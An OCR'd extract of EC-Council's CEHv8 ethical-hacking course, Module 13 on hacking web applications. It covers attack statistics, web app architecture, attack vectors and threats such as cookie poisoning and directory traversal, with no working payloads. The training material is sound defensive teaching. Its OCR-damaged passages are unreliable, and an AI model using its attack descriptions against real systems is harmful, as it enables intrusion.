Hacking web applications CEHv8 module 13

Hacking Web Applications
M o d u l e 1 3

Exam312-50 Certified Ethical HackerEthical Hacking and Countermeasures
H a c k in g W e b A p p lic a tio n s
M o d u l e 1 3
E n g in e e re d b y H ackers. P r e s e n te d b y P ro fe s s io n a ls .
a
CEH
E t h i c a l H a c k i n g a n d C o u n t e r m e a s u r e s v 8
M o d u l e 1 3 : H a c k i n g W e b A p p l i c a t i o n s
E x a m 3 1 2 - 5 0
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction isStrictly Prohibited.
Module 13 Page 1724

CEHS e c u r ity N e w s
S e c u r i t y N e w s
X S S A t t a c k s L e a d P a c k A s M o s t F r e q u e n t A t t a c k T y p e
S o u r c e : h t t p : / / w w w . d a r k r e a d i n g . c o m
S e c u r e c l o u d h o s t i n g c o m p a n y , F i r e H o s t , h a s t o d a y a n n o u n c e d t h e f i n d i n g s o f
it s l a t e s t w e b a p p l i c a t i o n a t t a c k r e p o r t , w h i c h p r o v i d e s s t a t i s t i c a l a n a ly s is o f t h e 1 5 m i l l i o n
c y b e r - a t t a c k s b l o c k e d b y its s e r v e r s in t h e US a n d E u r o p e d u r i n g Q 3 2 0 1 2 . T h e r e p o r t lo o k s a t
a t t a c k s o n t h e w e b a p p l i c a t i o n s , d a t a b a s e s a n d w e b s i t e s o f F i r e H o s t ' s c u s t o m e r s b e t w e e n J u ly
a n d S e p t e m b e r , a n d o f f e r s a n i m p r e s s i o n o f t h e c u r r e n t i n t e r n e t s e c u r i t y c l i m a t e as a w h o l e .
A m o n g s t t h e c y b e r - a t t a c k s r e g i s t e r e d in t h e r e p o r t , F i r e H o s t c a t e g o r i s e s f o u r a t t a c k t y p e s in
p a r t i c u l a r a s r e p r e s e n t i n g t h e m o s t s e r i o u s t h r e a t . T h e s e a t t a c k t y p e s a r e a m o n g F i r e H o s t 's
,S u p e r f e c t a ' a n d t h e y c o n s i s t o f C r o s s - s it e S c r i p t i n g (X SS ), D i r e c t o r y T r a v e r s a l s , S Q L I n j e c t i o n s ,
a n d C r o s s - s it e R e q u e s t F o r g e r y (C SR F ).
O n e o f t h e m o s t s i g n i f i c a n t c h a n g e s in a t t a c k t r a f f i c s e e n b y F i r e H o s t b e t w e e n Q 2 a n d Q 3 2 0 1 2
w a s a c o n s i d e r a b l e r is e in t h e n u m b e r o f c r o s s - s i t e a t t a c k s , in p a r t i c u l a r XSS a n d CSRF a t t a c k s
r o s e t o r e p r e s e n t 6 4 % o f t h e g r o u p in t h e t h i r d q u a r t e r (a 2 8 % i n c r e a s e d p e n e t r a t i o n ) . XSS is
n o w t h e m o s t c o m m o n a t t a c k t y p e in t h e S u p e r f e c t a , w i t h CSRF n o w in s e c o n d . F i r e H o s t ' s
s e r v e r s b l o c k e d m o r e t h a n o n e m i l l i o n XSS a t t a c k s d u r i n g t h i s p e r i o d a l o n e , a f i g u r e w h i c h r o s e
Module 13 Page 1725 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

69% , fr o m 6 0 3 ,0 1 6 s e p a ra te a tta c k s in Q 2 t o 1 ,0 1 8 ,8 1 7 in Q3. CSRF a tta c k s re a c h e d s e co nd
p lace on th e S u p e rfe c ta a t 8 4 3 ,5 1 7 .
C ross-site a tta c k s a re d e p e n d e n t u p o n th e tr u s t d e v e lo p e d b e tw e e n site a nd user. XSS a tta c k s
in v o lv e a w e b a p p lic a tio n g a th e rin g m a lic io u s d a ta fr o m a u se r via a tr u s te d site (o fte n c o m in g
in th e fo r m o f a h y p e rlin k c o n ta in in g m a lic io u s c o n te n t), w h e re a s CSRF a tta c k s e x p lo it th e tr u s t
t h a t a site has f o r a p a rtic u la r us e r in s te a d . T hese m a lic io u s s e c u rity e x p lo its can also be used
t o steal s e n s itiv e in fo r m a tio n such as u s e r n a m e s , p a s s w o rd s a nd c re d it ca rd d e ta ils - w it h o u t
th e site o r user's k n o w le d g e .
T h e s e v e rity o f th e s e a tta c k s is d e p e n d e n t o n th e s e n s itiv ity o f th e d a ta h a n d le d by th e
v u ln e ra b le site a n d th is ran g e s f r o m p e rs o n a l d a ta fo u n d on social n e tw o r k in g sites, t o th e
fin a n c ia l a n d c o n fid e n tia l d e ta ils e n te r e d on e c o m m e rc e sites a m o n g s t o th e rs . A g re a t n u m b e r
o f o rg a n is a tio n s ha ve fa lle n v ic tim to such a tta c k s in re c e n t ye a rs in c lu d in g a tta c k s o n PayPal,
H o tm a il a n d eBay, th e la tte r fa llin g v ic tim t o a sin g le CSRF a tta c k in 2 0 0 8 w h ic h ta r g e te d 18
m illio n users o f its K o re a n w e b s ite . F u r th e r m o r e in S e p te m b e r th is y e a r, IT g ia n ts M ic r o s o ft and
G o o g le C h ro m e b o th ran e x te n s iv e p a tc h e s ta r g e te d a t s e c u rin g XSS fla w s , h ig h lig h tin g th e
p re v a le n c e o f th is g r o w in g o n lin e th r e a t.
"C ro ss-site a tta c k s a re a s e ve re th r e a t t o bu siness o p e ra tio n s , e s p e c ia lly if se rve rs a re n 't
p r o p e r ly p re p a r e d ," said C hris H in k le y, CISSP - a S e n io r S e c u rity E n g in e e r a t F ire H o st. "It's v ita l
t h a t a n y site d e a lin g w it h c o n fid e n tia l o r p riv a te u s e r d a ta ta k e s th e n e ce ssa ry p re c a u tio n s to
e n s u re a p p lic a tio n s re m a in p ro te c te d . L o c a tin g and fix in g a n y w e b s ite v u ln e r a b ilit ie s a n d fla w s
is a key s te p in e n s u rin g y o u r bu sin ess a n d y o u r c u s to m e rs , d o n 't fa ll v ic tim to an a tta c k o f th is
n a tu re . T h e c o n s e q u e n c e s o f w h ic h can be s ig n ific a n t, in te r m s o f b o th fin a n c ia l a nd
re p u ta tio n a l d a m a g e ."
T h e S u p e rfe c ta a tta c k tr a ffic fo r Q 3 2 0 1 2 can be b ro k e n d o w n as fo llo w s :
As w it h Q 2 2 0 1 2 , th e m a jo r ity o f a tta c k s F ire H o st b lo c k e d d u rin g th e th ir d c a le n d a r q u a r t e r o f
2 0 1 2 o rig in a te d in th e U n ite d S tates ( l l m i l l i o n / 74% ). T h e re has h o w e v e r , b e e n a g re a t s h ift in
th e n u m b e r o f a tta c k s o r ig in a tin g f r o m E u ro p e th is q u a rte r, as 17% o f all m a lic io u s a tta c k tr a ffic
seen by F ire H o s t c a m e fr o m th is re g io n . E u ro p e o v e r to o k S o u th e rn Asia (w h ic h w a s re s p o n s ib le
fo r 6%), t o b e c o m e th e se c o n d m o s t lik e ly o rig in o f m a lic io u s tra ffic .
V a rie d tr e n d s a m o n g th e S u p e rfe c ta a tta c k te c h n iq u e s are d e m o n s tr a te d b e tw e e n th is q u a r te r
a n d last:
D u rin g th e b u ild u p to th e h o lid a y season, e c o m m e r c e a c tiv ity ra m p s up d ra m a tic a lly and
c y b e r-a tta c k s t h a t ta r g e t w e b s ite users' c o n fid e n tia l d a ta are also lik e ly t o in c re a s e as a re s u lt.
As w e ll as cro ss-site a tta c k s, th e o th e r S u p e rfe c ta a tta c k ty p e s , SQL In je c tio n a n d D ire c to ry
T ra n s ve rs a l, still re m a in a s ig n ific a n t th r e a t d e s p ite a s lig h t re d u c tio n in fr e q u e n c y th is q u a rte r.
E c o m m e rc e b u sin esse s n e e d to be a w a re o f th e risks t h a t th is p e rio d m a y p re s e n t it t o its
s e c u rity , as T o d d G lea so n , D ire c to r o f T e c h n o lo g y a t F ire H o st e xp la in s, "Y o u 'd b e t t e r b e lie v e
t h a t h a cke rs w ill t r y and ta k e a d v a n ta g e o f a n y surges in h o lid a y s h o p p in g . T h e y w ill be d e v is in g
a n u m b e r o f w a y s th e y can ta k e a d v a n ta g e o f a n y w e b a p p lic a tio n v u ln e ra b ilitie s a n d w ill use
an a s s o r t m e n t o f d iffe r e n t a tta c k ty p e s a n d te c h n iq u e s to d o so. W h e n it's a m a t t e r o f
Module 13 Page 1726

c o n f i d e n t i a l d a t a a t r is k , i n c l u d i n g c u s t o m e r ' s f i n a n c i a l i n f o r m a t i o n - c r e d i t c a r d a n d d e b i t c a r d
d e t a i l s - t h e r e ' s n o r o o m f o r c o m p l a c e n c y . T h e s e o r g a n i s a t i o n s n e e d t o k n o w t h a t t h e r e ' s a n
i n c r e a s e d l i k e l i h o o d o f a t t a c k d u r i n g t h i s t i m e a n d it 's t h e i r r e s p o n s i b i l i t y t o t a k e t h e n e c e s s a r y
s t e p s t o s t o p s u c h a t t a c k s . "
Copyright © 2013 UBM Tech, A ll rights reserved
http://www.darkreading.com/5ecuritv/news/240009508/firehost-q3-web-application-report-xss-
attacks-lead-pack-as-most-frequent-attack-type.html
Module 13 Page 1727

M o d u le O b je c t iv e s CEH
J How Web Applications Work J Session Management Attack
J Web Attack Vectors J Attack Data Connectivity
J Web Application Threats J Attack Web App Client
J Web App Hacking Methodology J Attack Web Services
J Footprint Web Infrastructure ■ ^ J Web Application Hacking Tools
J Hacking W ebServers
/1‫־‬
J Countermeasures
J Analyze Web Applications J Web Application Security Tools
J Attack Authentication Mechanism J Web Application Firewall
J Attack Authorization Schemes J Web Application Pen Testing
Copyright © by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited.
M o d u l e O b j e c t i v e s
T h e m a in o b je c tiv e o f th is m o d u le is t o s h o w th e v a rio u s kin d s o f v u ln e ra b ilitie s th a t
can be d is c o v e re d in w e b a p p lic a tio n s . T h e a tta c k s e x p lo itin g th e s e v u ln e ra b ilitie s a re also
h ig h lig h te d . T h e m o d u le s ta rts w it h a d e ta ile d d e s c rip tio n o f th e w e b a p p lic a tio n s . V a rio u s w e b
a p p lic a tio n th r e a ts a re m e n tio n e d . T h e h a c k in g m e t h o d o lo g y re ve a ls th e v a rio u s ste p s
in v o lv e d in a p la n n e d a tta c k . T h e v a rio u s to o ls t h a t a tta c k e rs use a re discussed t o e x p la in th e
w a y th e y e x p lo it v u ln e ra b ilitie s in w e b a p p lic a tio n s . T h e c o u n te r m e a s u r e s t h a t can be ta k e n to
t h w a r t a n y such a tta c k s a re also h ig h lig h te d . S e c u rity to o ls t h a t h e lp n e tw o r k a d m in is t r a t o r to
m o n it o r a n d m a n a g e th e w e b a p p lic a tio n are d e s c rib e d . Finally w e b a p p lic a tio n p e n te s t in g is
d iscussed.
This m o d u le fa m ilia riz e s y o u w ith :
Module 13 Page 1728

- Session M a n a g e m e n t A tta c k
S A tta c k D ata C o n n e c tiv ity
S A tta c k W e b A p p C lie n t
s A tta c k W e b S ervices
S W e b A p p lic a tio n H a ckin g T o o ls
S C o u n te rm e a s u re s
s W e b A p p lic a tio n S e c u rity T o o ls
s W e b A p p lic a tio n F ire w a ll
S W e b A p p lic a tio n Pen T e s tin g
H o w W e b A p p lic a tio n s W o r k
W e b A tta c k V e c to rs
W e b A p p lic a tio n T h re a ts
W e b A p p H a ckin g M e t h o d o lo g y
F o o tp r in t W e b In fra s tru c tu r e
H a ck in g W e b s e rv e rs
A n a ly z e W e b A p p lic a tio n s
A tta c k A u th e n tic a tio n M e c h a n is m
A tta c k A u th o r iz a tio n S ch e m e s
3 Page 1729 Ethical Hacking and Countermeasures Copyright © by EC‫־‬C0UI1Cil
A
£
A
A
A
Module

Copyright © by E & C oin a l. All Rights Reserved. Reproduction is Strictly Prohibited.
‫־‬ ‫־‬ ^ M o d u l e F l o w
W e b a p p lic a tio n s are th e a p p lic a tio n p ro g ra m s accessed o n ly w it h In te r n e t
c o n n e c tio n e n a b le d . T h e se a p p lic a tio n s use HTTP as t h e ir p r im a r y c o m m u n ic a t io n p r o t o c o l.
G e n e ra lly , th e a tta c k e rs ta r g e t th e s e a p p s fo r se v e ra l reasons. T h e y a re e x p o s e d t o v a rio u s
a tta c ks . For cle a r u n d e rs ta n d in g o f th e "h a c k in g w e b a p p lic a tio n s " w e d iv id e d th e c o n c e p t in to
v a rio u s s e ctio n s.
Q W e b A p p C o n c e p ts
Q W e b A p p T h re a ts
© H a ckin g M e t h o d o lo g y
Q W e b A p p lic a tio n H a ckin g T oo ls
© C o u n te rm e a s u re s
0 S e c u rity T o o ls
© W e b A p p Pen T e s tin g
Let us b e g in w it h th e W e b A p p c o n c e p ts .
Module 13 Page 1730

^ ^ W e b A p p P e n T e s t i n g W e b A p p C o n c e p ts
S e c u rity T o o ls W e b A p p T h re a ts
C o u n te rm e a s u r e s ^ H a c k in g M e t h o d o lo g y
W e b A p p lic a tio n H a c k in g T o o ls
T h is s e c t i o n i n t r o d u c e s y o u t o t h e w e b a p p l i c a t i o n a n d it s c o m p o n e n t s , e x p l a i n s h o w t h e w e b
a p p l i c a t i o n w o r k s , a n d its a r c h i t e c t u r e . I t p r o v i d e s i n s i g h t i n t o w e b 2 . 0 a p p l i c a t i o n , v u l n e r a b i l i t y
s t a c k s , a n d w e b a t t a c k v e c t o r s .
Module 13 Page 1731

CEH
Web Application Security
Statistics
Cross-Site Scripting
Information Leakage
Copyright © by E tC tin d l. All Rights Reserved. Reproduction is Strictly Prohibited.
f f W e b A p p l i c a t i o n S e c u r i t y S t a t i s t i c s
~ S ou rce : h tt p s : / / w w w . w h it e h a t s e c . c o m
A c c o rd in g t o th e W H IT E H A T s e c u rity w e b s ite sta tis tic s r e p o r t in 2 0 1 2 , it is c le a r th a t th e cross-
site s c rip tin g v u ln e ra b ilitie s are fo u n d o n m o r e w e b a p p lic a tio n s w h e n c o m p a r e d t o o th e r
v u ln e ra b ilitie s . F ro m th e g ra p h y o u can o b s e rv e t h a t in th e y e a r 2 0 1 2 , cro ss -site s c rip tin g
v u ln e ra b ilitie s a re th e m o s t c o m m o n v u ln e ra b ilitie s fo u n d in 55% o f th e w e b a p p lic a tio n s . O n ly
10% o f w e b a p p lic a tio n a tta c k s a re based o n in s u ffic ie n t se ssio n e x p ir a tio n v u ln e ra b ilitie s . In
o r d e r t o m in im iz e th e risks a ss o cia te d w it h cro ss -site s c rip tin g v u ln e ra b ilitie s in th e w e b
a p p lic a tio n s , y o u have t o a d o p t n e ce s sa ry c o u n te r m e a s u re s a g a in s t th e m .
Module 13 Page 1732

Cross-Site Scripting
Inform ation Leakage
Content Spoofing
16%
Insufficient Authorization
■ L Cross-Site Request Forgery
Brute Force
Predictable Resource Location
SQL Injection
10% Session Fixation
Insufficient Session Expiration
2010
W
O
■a>4
Q
aI—H
£
C
o
• H
0
■ H
a .
a
1
FIGURE 13.1: WHITEHAT SECURITY WEBSITE STATISTICS REPORT, 2012
Module 13 Page 1733

I n t r o d u c t i o n t o W e b A p p l i c a t i o n s C E H
T h o u g h w e b a p p lic a tio n s e n fo rc e c e rta in
s e c u rity p o licie s, th e y are v u ln e ra b le
to v a rio u s a tta c k s such as SQL
in je c tio n , cro ss-site s c rip tin g ,
session h ija c k in g , etc.
* ,
W e b a p p lic a tio n s p ro v id e an in te rfa c e b e tw e e n
e n d users a nd w e b se rve rs th ro u g h a set o f
w e b pages th a t are g e n e ra te d a t th e
se rver e nd o r c o n ta in s c rip t co d e to
be e xe cu te d d y n a m ic a lly w ith in
th e c lie n t w e b b ro w s e r
N e w w e b te c h n o lo g ie s such as
W e b 2 .0 p ro v id e m o re a tta c k
su rfa ce fo r w e b a p p lic a tio n
e x p lo ita tio n
C o p yrig h t © by E&C01nal. A ll R ights R eserved. R ep ro d u ctio n is S trictly Pro h ibited .
W e b a p p lic a tio n s a n d W e b 2 .0
te c h n o lo g ie s a re in v a ria b ly u s e d to
s u p p o r t c ritic a l b u s in e s s fu n c tio n s
s u c h as C R M , S C M , e tc . a n d im p ro v e
b u s in e s s e ffic ie n c y
I n t r o d u c t i o n t o W e b A p p l i c a t i o n s
W eb applications are the application th a t run on the rem ote w eb server and send the
o u tp u t over the Internet. W eb 2.0 technologies are used by all the applications based on the
web-based servers such as com m unication w ith users, clients, th ird -p a rty users, etc.
A w eb application is com prised o f m any layers o f functiona lity. However, it is considered a
three-layered architecture consisting o f presentation, logic, and data layers.
The web architecture relies substantially on the technology popularized by the W orld W ide
W eb, H ypertext M arkup Language (HTML), and the prim ary tra n sp o rt m edium , e.g. Hyper Text
Transfer Protocol (HTTP). HTTP is the m edium o f com m unication betw een the server and the
client. Typically, it operates over TCP port 80, but it may also com m unicate over an unused
port.
W eb applications provide an interface betw een end users and w eb servers through a set of
w eb pages th a t are generated at the server end or contain script code to be executed
dynam ically w ith in the client w eb browser.
Some o f the popular w eb servers present today are M icrosoft IIS, Apache Software
Foundation's Apache HTTP Server, AOL/Netscape's Enterprise Server, and Sun One. Resources
are called U niform Resource Identifiers (URIs), and they may either be static pages or contain
dynam ic content. Since HTTP is stateless, e.g., the proto co l does not m aintain a session state,
Module 13 Page 1734

the requests fo r resources are treated as separate and unique. Thus, the inte g rity o f a link is not
m aintained w ith the client.
Cookies can be used as tokens, w hich servers hand over to clients to allow access to websites.
However, cookies are not perfect fro m a security point o f view because they can be copied and
stored on the client's local hard disk, so th a t users do not have to request a token fo r each
query. Though w eb applications enforce certain security policies, they are vulnerable to various
attacks such as SQL injection, cross-site scripting, session hijacking, etc. Organizations rely on
w eb applications and W eb 2.0 technologies to support key business processes and im prove
perform ance. New w eb technologies such as W eb 2.0 provide m ore attack surface fo r w eb
application e xp lo ita tio n .
Attackers use d iffe re n t types o f vulnerabilities th a t can be discovered in w eb applications and
exploit them to com prom ise w eb applications. Attackers also use tools to launch attacks on
w eb applications.
Module 13 Page 1735

W e b A p p l i c a t i o n C o m p o n e n t s C
Urtifwd
E H
itfcMjl NMhM
1
IS
C o p yrig h t © by E&Coinal. A ll R ights R eserved. R ep ro d u ctio n is S trictly Pro h ibited .
^ W e b A p p l i c a t i o n C o m p o n e n t s
The com ponents o f w eb applications are listed as follow s
Login: M ost o f the w ebsites allow a u th e n tic users to access the application by means o f login. It
means th a t to access the service or content offered by the w eb application user needs to
subm it his/her usernam e and password. Example gm ail.com
The Web Server: It refers to either softw are or hardw are intended to deliver web content th a t
can be accessed through the Internet. An exam ple is the w eb pages served to the w eb brow ser
by the web server.
Session Tracking Mechanism: Each w eb application has a session tracking m echanism . The
session can be tracked by using cookies, URL rew riting, or Secure Sockets Layer (SSL)
inform ation.
User Permissions: W hen you are not allow ed to access the specified web page in which you are
logged in w ith user permissions, you may redirect again to the login page or to any oth e r page.
The Application Content: It is an interactive program th a t accepts w eb requests by clients and
uses the param eters th a t are sent by the w eb brow ser fo r carrying out certain functions.
Data Access: Usually the w eb pages w ill be contacting w ith each oth e r via a data access library
in which all the database details are stored.
Module 13 Page 1736

The Data Store: It is a w ay to the im p o rta n t data th a t is shared and synchronized betw een the
children/thre ats. This stored inform ation is quite im p o rta n t and necessary fo r higher levels of
the application fra m e w o rk. It is not m andatory th a t the data store and the w eb server are on
the same netw ork. They can be in contact or accessible w ith each other through the netw ork
connection.
Role-level System Security
Application Logic: Usually w eb applications are divided into tiers o f w hich the application logic
is the m iddle tier. It receives the request from the w eb brow ser and gives it services
accordingly. The services offered by the application logic include asking questions and giving
the latest updates against the database as w ell as generating a user interface.
Logout: An individual can shut dow n or log out of the w eb application or brow ser so th a t the
session and the application associated w ith it end. The application ends e ith e r by taking the
initiative by the application logic or by autom atically ending w hen the servlet session tim es out.
Module 13 Page 1737

H o w W e b A p p l i c a t i o n s W o r k C E H
SELECT * fr o m new s w h e re i d = 6 3 2 9
O u tp u t
ID Topic News
6329 Tech CNN
C o p yrig h t © by E&C01nal. A ll R ights R eserved. R ep ro d u ctio n is S trictly Pro h ibited .
H o w W e b A p p l i c a t i o n s W o r k
W henever som eone clicks or types in the brow ser, im m ediately the requested w ebsite
or content is displayed on the screen of the com puter, but w hat is the m echanism behind this?
This is the step-by-step process th a t takes place once a user sends a request fo r particular
content or a w ebsite w here m ultiple com puters are involved.
The w eb application m odel is explained in three layers. The first layer deals w ith the user input
through a web brow ser or user interface. The second layer contains JSP (Java servlets) or ASP
(Active Server Pages), the dynam ic content generation technolo gy tools, and the last layer
contains the database fo r storing custom er data such as user names and passwords, credit card
details, etc. or oth e r related inform ation.
Let's see how the user triggers the initial request through the brow ser to the w eb application
server:
© First the user types the w ebsite name or URL in the brow ser and the request is sent to
the w eb server.
© On receiving the request ,the w eb server checks the file extension:
© If the user requests a sim ple w eb page w ith an HTM or HTML extension, the web
server processes the request and sends the file to the user's browser.
Module 13 Page 1738

© If the user requests a w eb page w ith the extension CFM, CFML, or CFC, then the
request m ust be processed by the w eb application server.
Therefore, the web server passes the user's request to the w eb application server.
The user's request is now processed by the w eb applicatio n server. In order to
process the user's request, the w eb server accesses the database placed at the th ird
layer to perform the requested task by updating or retrieving the inform ation stored
on the database. Once done processing the request, web application server sends
the results to the w eb server, w hich in tu rn sends the results to the user's browser.
User Login Form Internet Firewall Web Server
FIGURE 1 3.2 : W o rk in g o f W e b A p p lic a tio n
Module 13 Page 1739

W e b A p p l i c a t i o n A r c h i t e c t u r e C E H
y ^ lln t e m e r N
( W eb
Clients
Services
Business Layer
A p p lica tion Server
Business
Logic
J2EE .NET COM
XCode C++ COM+
Legacy Application
Data Access
‫ה‬Proxy Server,
Cache
P re se n ta tio n Layer
Firewall
HTTP R equest Parser
A u th e n tication
and Login
Resource
H andler
Servlet
C ontainer
Copyright © by E&Coinal. All Rights Reserved. Reproduction is Strictly Prohibited.
W e b A p p l i c a t i o n A r c h i t e c t u r e
All w eb applications execute w ith the help o f the w eb brow ser as a support client. The
w eb applications use a group o f server-side scripts (ASP, PHP, etc.) and client-side scripts
(HTML, JavaScript, etc.) to execute the application. The inform ation is presented by using the
client-side script and the hardw are tasks such as storing and gathering required data by the
server-side script.
In the follow ing architecture, the clients uses d iffe re n t devices, w eb browsers, and external
w eb services w ith the Internet to get the application executed using d iffe re n t scripting
languages. The data access is handled by the database layer using cloud services and a
database server.
Module 13 Page 1740

Business Layer
Application Server
J2EE .NET COM
Business
logic
XCode C+♦ COM♦
legacy Application
Data Access
Database Layer
Cloud Services
Database Server
Clients
W eb Browser‫ו‬——,
V•*'‫׳‬ ‫י‬ ‫ד‬ ‫ג‬ ‫ל‬ •‫י‬_ _ _U S
^External™1
W eb
S«rvic*1
Presentation
layer
Fla sh .
S ilv e r lljh t.
Ja va S crip (
Smart Phonas,
Web
Appliance
f
Proxy Server,
Cache
Web Server
Prssantation Layer
Firewall
HTTP Request Parser
Servlet Resource Authentication
Container Handler and Login
FIGURE 1 3 .3 : W e b A p p lic a tio n A rc h ite c tu re
Module 13 Page 1741

W e b 2 . 0 A p p l i c a t i o n s C E H
C«rt1fW4 itfciul NMkM
J W e b 2 .0 refers to a n e w g e n e ra tio n o f W e b a p p lic a tio n s th a t p ro v id e an in fra s tru c tu re fo r m o re d y n a m ic
user p a rtic ip a tio n , social in te ra c tio n a nd c o lla b o ra tio n
Blogs (W ordpress)
Q Advanced gaming
ODynamic as opposed to static site content
ORSS-generated syndication
O Social netw o rking sites (Flickr,
' Facebook, del.cio.us)
v‫״‬ ..rid'‫'׳׳‬«»?
' Q Mash-ups (Emails, IMs, Electronic
f payment systems)
OW ikis and oth e r collaborative applications
Q Google Base and other free Web services
(Google Maps)
o o
New technologies like AJAX (Gmail, YouTube) Q
M obile application (iPhone) O
Flash rich interface websites O
Fram eworks (Yahool Ul
Library, jQ uery)
Cloud computing websites like W
(amazon.com) ^
Interactive encyclopedias and dictionaries O
ine office software (Google Docs and Microsoft light)
Ease o f data creation, m odification, or
deletion by individual users
C o p yrig h t © by E&C01nal.A ll R ights R eserved. R ep ro d u ctio n is S trictly Pro h ibited .
W e b 2 . 0 A p p l i c a t i o n s
W eb 2.0 refers to a new generation o f w eb applications th a t provide an in fra stru ctu re
fo r m ore dynam ic user participation, social interaction, and collaboration. It offers various
features such as:
© Advanced gam ing
© Dynamic as opposed to static site content
© RSS-generated syndication
© Social netw orking sites (Flickr, Facebook, del.cio.us)
© M ash-ups (emails, IMs, electronic paym ent systems)
© W ikis and oth e r collaborative applications
© Google Base and oth e r free w eb services (Google Maps)
© Ease o f data creation, m odification, or deletion by individual users
© Online office softw are (Google Docs and M icrosoft Light)
© Interactive encyclopedias and dictionaries
© Cloud com puting w ebsites such as Am azon.com
Module 13 Page 1742

6 Fram eworks (Yahoo! Ul Library, j Query)
© Flash-rich interface websites
Q M obile application (iPhone)
Q New technologies like AJAX (Gmail, YouTube)
© Blogs (W ordpress)
Module 13 Page 1743

C E HV u l n e r a b i l i t y S t a c k
_
C u s to m W e b A p p lic a tio n s
B _
B u s in e s s Logic F la w s
T e c h n ic a l V u ln e ra b ilitie s
T h ird P a rty C o m p o n e n ts
E l E O p e n S o u rc e / C o m m e rc ia l
f ^ ‫־‬w r O ra c le / M yS Q L / M S SQL
A p a c h e / M ic r o s o ft IIS
Apache
W in d o w s / L in u x
/OSX
R o u te r / S w itc h
IPS / IDS
D a ta b a s e
W e b S e rv e r
O p e ra tin g S y s te m
N e tw o r k
S e c u rity
V u l n e r a b i l i t y S t a c k
i f - The w eb applications are m aintained and accessed through various levels th a t include:
custom w eb applications, th ird -p a rty com ponents, databases, w eb servers, operating systems,
netw orks, and security. All the m echanism s or services em ployed at each level help the user in
one or the oth e r way to access the w eb application securely. W hen talking about web
applications, security is a critical com ponent to be considered because w eb applications are a
m ajor sources o f attacks. The follow ing v u ln e ra b ility stack shows the levels and the
corresponding elem ent/m echanism /service em ployed at each level th a t makes the web
applications vulnerable:
Module 13 Page 1744

Exam312-50 Certified Ethical Hacker
Business Logic Flaws
Technical Vulnerabilities
Open Source / Commercial
Oracle / MySQL / MS SQL
Apache / Microsoft IIS
Windows / Linux
/O S X
Router / Switch
IPS /ID S
Ethical Hacking and Countermeasures
Custom Web Applications
Third Party Components
Security
FIGURE 1 3 .4 : V u ln e ra b ility S tack
Module 13 Page 1745

-
C E H
(
‫־‬ ‫־‬ ‫־‬
W e b A t t a c k V e c t o r s
A n a tta c k v e c to r is a p a th o r m e a n s b y w h ic h a n a tta c k e r ca n g a in
w a ccess to c o m p u te r o r n e tw o r k re s o u rc e s in o r d e r to d e liv e r an
a tta c k p a y lo a d o r c a u s e a m a lic io u s o u tc o m e
A tta c k v e c to rs in c lu d e p a r a m e te r m a n ip u la tio n , X M L p o is o n in g ,
c lie n t v a lid a tio n , s e rv e r m is c o n fig u ra tio n , w e b s e rv ic e r o u tin g
issu e s, a n d c ro s s -s ite s c rip tin g
S e c u rity c o n tr o ls n e e d to b e u p d a te d c o n tin u o u s ly as th e a tta c k
v e c to rs ke e p c h a n g in g w ith re s p e c t to a ta rg e t o f a tta c k
W e b A t t a c k V e c t o r s
An attack vector is a m ethod o f entering into to unauthorized systems to perform ing
m alicious attacks. Once the attacker gains access into the system or the netw ork he or she
delivers an attack payload or causes a m alicious outcom e. No protection m ethod is com pletely
a tta ck-p ro o f as attack vectors keep changing and evolving w ith new technological changes.
Examples o f various types o f attack vectors:
© P aram eter m an ip u la tio n : Providing the w rong input value to the w eb services by the
attacker and gaining the control over the SQL, LDAP, XPATH, and shell com m ands.
W hen the incorrect values are provided to the w eb services, then they become
vulnerable and are easily attacked by w eb applications running w ith w eb services.
0 XML poisoning: Attackers provide m anipulated XML docum ents th a t w hen executed can
disturb the logic o f parsing m ethod on the server. W hen huge XMLs are executed at the
application layer, then they can be easily be com prom ised by the attacker to launch his
or her attack and gather inform ation.
© Client va lid a tio n : M ost client-side validation has to be supported by server-side
authentication. The AJAX routines can be easily m anipulated, which in tu rn makes a way
fo r attackers to handle SQL injection, LDAP injection, etc. and negotiate the web
application's key resources.
Module 13 Page 1746

0 Server M isconfiguration: The attacker exploits the vulnerabilities in the w eb servers and
tries to break the validation m ethods to get access to the co n fid e n tia l data stored on
the servers.
0 Web service routing issues: The SOAP messages are perm itted to access d iffe re n t nodes
on the Internet by the W S-Routers. The exploited interm ediate nodes can give access to
the SOAP messages th a t are com m unicated betw een tw o endpoints.
0 Cross-site scripting: W henever any infected JavaScript code is executed, then the
targeted browsers can be exploited to gather inform ation by the attacker.
Module 13 Page 1747

C o p yrig h t © by E&Coinal.A ll R ights R eserved. R ep ro d u ctio n is S trictly Pro h ibited .
‫־‬ ‫־‬ ^ M o d u l e F l o w
W eb applications are targeted by attackers fo r various reasons. The first issue is
quality o f the source code as related to security is poor and another issue is an application w ith
"com plex setup." Due to these loopholes, attackers can easily launch attacks by e xploiting
them . Now we w ill discuss the threats associated w ith w eb applications.
^ Web App Pen Testing Web App Concepts
m Security Tools W eb App Threats
J k Countermeasures e‫־‬‫־‬‫־‬s Hacking Methodology
1S>
Web Application Hacking Tools
B#
Module 13 Page 1748

This section lists and explains the various w eb application th re a ts such as p aram eter/form
tam pering, injection attacks, cross-site scripting attacks, DoS attacks, session fixation attacks,
im proper e rror handling, etc.
Ethical Hacking and Countermeasures Exam312-50 Certified Ethical Hacker
Module 13 Page 1749

W e b A p p l i c a t i o n T h r e a t s 1 ‫־‬ C E H
UrtiM Itkml Mstkm
B ro ke n A c c o u n t
M a n a g e m e n t
In fo rm a tio n
Leakage
Im p ro p e r
E rro r H a n d lin gS to ra g e
C oo kie
P o iso n in g
Cop> ■ight © by EC -C a uacil. A ll R ights R eserved. R ep ro d u ctio n is S trictly Pro h ibited .
W e b A p p l i c a t i o n T h r e a t s - 1
W eb application threats are not lim ited to attacks based on URL and port80. Despite
using ports, protocols, and the OSI layer, the integrity o f m ission-critical applications m ust be
protected from possible fu tu re attacks. Vendors w ho w ant to protect th e ir products'
applications m ust be able to deal w ith all m ethods o f attack.
The various types o f w eb application threats are as follow s:
C o o k i e P o i s o n i n g
By changing the inform ation inside the cookie, attackers bypass the a u th e n tica tio n
process and once they gain control over the netw ork, they can either m odify the
content, use the system fo r the m alicious attack, or steal in fo rm a tio n from the user's system.
D i r e c t o r y T r a v e r s a l
Attackers e xp lo it HTTP by using d ire cto ry traversal and they w ill be able to access
restricted directories; they execute com m ands outside o f the w eb server's root
directory.
